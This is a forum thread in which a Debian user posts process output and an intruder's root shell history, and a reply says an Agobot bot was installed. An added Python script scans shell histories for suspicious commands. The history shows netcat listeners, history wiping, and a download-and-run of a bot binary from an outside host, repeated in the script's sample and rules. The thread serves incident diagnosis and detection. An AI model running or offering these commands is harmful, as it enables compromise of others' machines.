I think I've been hacked

1. I think I've been hacked

Bona
bonanati

(uses Debian)

Posted on 23/10/2009 - 10:37h

Hi everyone, take a look at my ./bash_history; I didn't do any of this....
Nespaco:/home/fabio# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 2096 252 ? Ss Oct13 0:04 init [2]
root 2 0.0 0.0 0 0 ? S< Oct13 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S< Oct13 0:00 [migration/0]
root 4 0.0 0.0 0 0 ? S< Oct13 0:38 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< Oct13 0:00 [watchdog/0]
root 6 0.0 0.0 0 0 ? S< Oct13 0:00 [events/0]
root 7 0.0 0.0 0 0 ? S< Oct13 3:24 [khelper]
root 10 0.0 0.0 0 0 ? S< Oct13 0:00 [kstop/0]
root 55 0.0 0.0 0 0 ? S< Oct13 0:00 [kintegrityd/0]
root 57 0.0 0.0 0 0 ? S< Oct13 0:00 [kblockd/0]
root 59 0.0 0.0 0 0 ? S< Oct13 0:00 [kacpid]
root 60 0.0 0.0 0 0 ? S< Oct13 0:00 [kacpi_notify]
root 113 0.0 0.0 0 0 ? S< Oct13 0:00 [kseriod]
root 146 0.0 0.0 0 0 ? S< Oct13 0:00 [kondemand/0]
root 165 0.0 0.0 0 0 ? S Oct13 0:04 [pdflush]
root 166 0.0 0.0 0 0 ? S Oct13 0:02 [pdflush]
root 167 0.0 0.0 0 0 ? S< Oct13 0:11 [kswapd0]
root 168 0.0 0.0 0 0 ? S< Oct13 0:00 [aio/0]
root 463 0.0 0.0 0 0 ? S< Oct13 0:00 [ksuspend_usbd]
root 474 0.0 0.0 0 0 ? S< Oct13 0:00 [khubd]
root 725 0.0 0.0 0 0 ? S< Oct13 0:00 [hid_compat]
root 757 0.0 0.0 0 0 ? S< Oct13 0:00 [ata/0]
root 762 0.0 0.0 0 0 ? S< Oct13 0:00 [ata_aux]
root 821 0.0 0.0 0 0 ? S< Oct13 0:19 [kjournald]
root 897 0.0 0.0 2288 220 ? S<s Oct13 0:00 udevd --daemon
root 1194 0.0 0.0 0 0 ? S< Oct13 0:00 [kgameportd]
root 1620 0.0 0.4 5480 2476 ? Ss Oct13 12:30 /sbin/mount.ntf
daemon 1717 0.0 0.0 1888 196 ? Ss Oct13 0:00 /sbin/portmap
statd 1728 0.0 0.0 1952 212 ? Ss Oct13 0:00 /sbin/rpc.statd
root 1939 0.0 0.2 28532 1268 ? Sl Oct13 0:11 /usr/sbin/rsysl
root 1950 0.0 0.0 1764 276 ? Ss Oct13 0:00 /usr/sbin/acpid
103 1960 0.0 0.0 2620 232 ? Ss Oct13 0:00 /usr/bin/dbus-d
root 1975 0.0 0.0 5416 452 ? Ss Oct13 0:06 /usr/sbin/sshd
root 1996 0.0 0.2 6364 1364 ? Ss Oct13 0:00 /usr/sbin/cupsd
101 2263 0.0 0.0 6276 312 ? Ss Oct13 0:00 /usr/sbin/exim4
105 2299 0.0 0.1 5244 844 ? Ss Oct13 0:02 /usr/sbin/hald
root 2300 0.0 0.0 3320 260 ? S Oct13 0:00 hald-runner
root 2319 0.0 0.0 3384 248 ? S Oct13 0:00 hald-addon-inpu
105 2324 0.0 0.0 2268 180 ? S Oct13 0:00 hald-addon-acpi
root 2344 0.0 0.0 14224 372 ? Ss Oct13 0:00 /usr/sbin/gdm
root 2350 0.0 0.0 14688 496 ? S Oct13 0:00 /usr/sbin/gdm
root 2356 0.1 0.3 11260 1736 tty7 Ss+ Oct13 18:35 /usr/X11R6/bin/
root 2368 0.0 0.0 10856 196 ? Ss Oct13 0:00 /usr/sbin/squid
proxy 2370 0.4 38.9 204424 200908 ? S Oct13 59:20 (squid) -D -YC
root 2379 0.0 0.0 3852 336 ? Ss Oct13 0:00 /usr/bin/system
root 2388 0.0 0.1 3736 796 ? Ss Oct13 0:03 /usr/sbin/dhcpd
gdm 2409 0.1 1.5 36300 8124 ? Ss Oct13 18:47 /usr/lib/gdm/gd
proftpd 2410 0.0 0.0 5488 472 ? Ss Oct13 0:05 proftpd: (accep
daemon 2428 0.0 0.0 2044 212 ? Ss Oct13 0:00 /usr/sbin/atd
root 2448 0.0 0.0 3452 408 ? Ss Oct13 0:00 /usr/sbin/cron
root 2556 0.0 0.0 1764 160 tty1 Ss+ Oct13 0:00 /sbin/getty 384
root 2557 0.0 0.0 1764 160 tty2 Ss+ Oct13 0:00 /sbin/getty 384
root 2558 0.0 0.0 1764 160 tty3 Ss+ Oct13 0:00 /sbin/getty 384
root 2561 0.0 0.0 1764 160 tty4 Ss+ Oct13 0:00 /sbin/getty 384
root 2563 0.0 0.0 1764 160 tty5 Ss+ Oct13 0:00 /sbin/getty 384
root 2564 0.0 0.0 1764 160 tty6 Ss+ Oct13 0:00 /sbin/getty 384
root 2929 0.0 0.2 8036 1048 ? Ss Oct13 0:24 /usr/sbin/nmbd
root 2931 0.0 0.3 13776 1576 ? Ss Oct13 0:00 /usr/sbin/smbd
root 2937 0.0 0.1 13656 884 ? S Oct13 0:00 /usr/sbin/smbd
root 4723 0.1 0.3 110632 1832 ? Sl Oct15 17:16 /usr/sbin/ftpdd
root 9948 0.0 0.5 8160 2692 ? Ss 10:44 0:00 sshd: root@pts/
root 10009 0.0 0.1 3888 632 ? S Oct20 0:00 /bin/sh /usr/bi
mysql 10050 0.0 2.6 119328 13700 ? Sl Oct20 1:24 /usr/sbin/mysql
root 10051 0.0 0.0 3004 512 ? S Oct20 0:00 logger -p daemo
root 10100 0.0 0.3 4220 1708 pts/0 Ss 10:45 0:00 -bash
nobody 13175 0.0 0.7 14852 3928 ? S 10:48 0:00 /usr/sbin/smbd
proxy 15182 0.0 0.0 1608 324 ? Ss Oct22 0:00 (unlinkd)
fabio 17931 0.0 0.4 5780 2524 ? S 10:54 0:00 proftpd: fabio
fabio 18593 0.0 0.4 5780 2524 ? S 10:55 0:00 proftpd: fabio
fabio 19736 0.0 0.4 5780 2524 ? S 10:56 0:00 proftpd: fabio
root 21361 0.6 0.8 15088 4328 ? S 10:58 0:01 /usr/sbin/smbd
root 23831 0.0 0.1 3716 1028 pts/0 R+ 11:01 0:00 ps aux
root 23885 0.0 0.4 13264 2156 ? Ss Oct20 0:02 /usr/sbin/apach
www-data 23899 0.0 0.3 13172 1740 ? S Oct20 0:00 /usr/sbin/apach
www-data 23900 0.0 0.5 234940 3008 ? Sl Oct20 0:00 /usr/sbin/apach
www-data 23907 0.0 0.5 234940 2936 ? Sl Oct20 0:00 /usr/sbin/apach
root 30158 0.0 0.9 15232 4804 ? S 09:08 0:02 /usr/sbin/smbd
nobody 30406 0.0 0.9 15072 4820 ? S 09:08 0:02 /usr/sbin/smbd

/root/.bash_history
last
w
sync64 115.84.182.227
w
ps aux
nc -v -n -l -p 1212
w
cat /root/.bash_history
echo cat /root/.bash_history >/root/.bash_history
echo "">/root/.bash_history
w
nc -v -l -p 1212
nc -v -l -p 1212
ps aux
w
cat/root.bash
cat /root/.bash_history
last
sync64 cs-tor.bu.edu
last
locate mysql.conf
locate my.conf
locate my.*
locate mysql
vi /etc/mysql//my.cnf
locate pure*
locate php.ini
locate Php.ini
locate php
cd /var/www
ls
cd ..
ls
cd log
ls
wget http://fimap.googlecode.com/files/fimap_alpha_v05.tar.gz
tar -xvzf imap*
tar -xvzf fima*
ls
cd fim*
ls
./fimap.py
./fimap.py -u "http://localhost/vulnerable.php?inc=index.php"
~ls
ls
./configure
./config.py
chmod 777 *
./config.py
ls
uname -a
cd /tmp
mkdir work
cd work
wget http://www.rosssyndicate.com/.npe/agobot3
chmod +x agobot3
./agobot3
exit
exit
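As an added example (not part of the original thread), here is a small triage script that scans a shell history for the kinds of commands visible above: a listening netcat, downloads of tooling, overwriting of /root/.bash_history, blanket chmod 777, and a file made executable and then run. The sample history is an abridged copy of the posted one with the bot-hosting URL replaced by a placeholder; the rules are heuristics for review, not proof of compromise.

```python
"""Flag suspicious commands in a bash_history (added example, not from the post)."""
import re

# Heuristic rules keyed on what the posted history actually contains.
RULES = [
    ("netcat listener", re.compile(r"^nc\b.*\s-l(\s|$)")),
    ("remote download", re.compile(r"^(wget|curl)\s+\S+")),
    ("history tampering", re.compile(r">\s*/root/\.bash_history|history\s+-c")),
    ("blanket chmod 777", re.compile(r"^chmod\s+777\b")),
]
CHMOD_X = re.compile(r"^chmod\s+\+x\s+(\S+)")


def triage_history(lines):
    """Return (line_no, label, command) for every rule hit.

    Also emits a hit when a file is made executable with `chmod +x NAME`
    and later run as `./NAME`, the download-and-run pattern seen above.
    """
    hits = []
    made_exec = {}  # file name -> line where it was made executable
    for no, raw in enumerate(lines, 1):
        cmd = raw.strip()
        if not cmd:
            continue
        for label, rx in RULES:
            if rx.search(cmd):
                hits.append((no, label, cmd))
        m = CHMOD_X.match(cmd)
        if m:
            made_exec[m.group(1)] = no
        for name, where in made_exec.items():
            if cmd == f"./{name}":
                hits.append((no, f"executed file made +x at line {where}", cmd))
    return hits


# Constructed sample: abridged from the posted history; the bot URL is a placeholder.
SAMPLE_HISTORY = """last
w
ps aux
nc -v -n -l -p 1212
cat /root/.bash_history
echo "">/root/.bash_history
wget http://fimap.googlecode.com/files/fimap_alpha_v05.tar.gz
chmod 777 *
cd /tmp
mkdir work
cd work
wget http://attacker.invalid/agobot3
chmod +x agobot3
./agobot3
exit""".splitlines()

if __name__ == "__main__":
    for no, label, cmd in triage_history(SAMPLE_HISTORY):
        print(f"line {no:3d}: {label:<32} {cmd}")
```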

2. Re: I think I've been hacked

Pedro Pereira
pogo

(uses Fedora)

Posted on 23/10/2009 - 11:12h

From the looks of it, you really were hacked and a bot was installed on your machine. I suggest you kill all the agobot3 processes and rebuild the machine from scratch.

[]'s

Pedro
www.pedropereira.net
